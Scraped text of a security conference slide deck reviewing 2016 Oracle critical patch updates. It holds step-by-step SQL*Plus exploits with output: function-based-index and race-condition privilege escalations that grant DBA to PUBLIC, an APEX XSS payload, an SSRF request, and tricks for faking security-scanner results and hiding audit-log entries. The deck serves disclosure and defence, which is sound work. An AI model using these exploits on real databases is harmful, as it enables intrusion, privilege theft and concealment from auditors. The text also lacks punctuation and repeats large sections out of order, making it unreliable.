==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
January 2016 CPU
7 security fixes (No remote exploitable)
1 Java VM (CVSS 90)
1 Workspace Manager (CVSS 65)
2 XML Database (CVSS 55 40)
1 Database Vault (CVSS 40)
1 Security (CVSS 40)
1 XML Developerrsquos Kit (CVSS 40)
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html
Jan 2016 CPU- CVE-2016-0467
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Oracle native auditing fails to capture
bdquoCreate Java Sourceldquo
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Jan 2016 CPU- CVE-2016-0467
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Oracle native auditing fails to capture
bdquoCreate Java Sourceldquo
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
